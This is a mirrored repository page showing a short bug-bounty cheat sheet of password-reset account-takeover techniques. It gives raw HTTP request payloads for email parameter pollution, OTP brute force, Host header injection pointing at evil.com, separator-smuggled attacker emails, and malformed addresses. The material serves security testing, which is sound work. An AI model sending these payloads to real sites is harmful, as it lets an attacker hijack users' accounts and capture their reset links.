ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-19 02:46:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
35198d15d7
AllAboutBugBounty/AccountTakeover.md
Muhammad Daffa 35198d15d7
Account Takover [2] 
Add 3 tips
2020-09-03 21:04:19 +07:00

766 B
Raw Blame History

Account Takeover

  1. Parameter pollution in reset password
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
  1. Bruteforce the OTP code
POST /reset
[...]
email=victim@mail.com&code=$123456$
  1. Host header Injection
POST /reset
Host: evil.com
[...]
email=victim@mail.com

And the victim will receive the reset link with evil.com

  1. Using separator in value of the parameter
POST /reset
[...]
email=victim@mail.com,hacker@mail.com

POST /reset
[...]
email=victim@mail.com%20hacker@mail.com

POST /reset
[...]
email=victim@mail.com|hacker@mail.com
  1. No domain in value of the paramter
POST /reset
[...]
email=victim
  1. No TLD in value of the paramter
POST /reset
[...]
email=victim@mail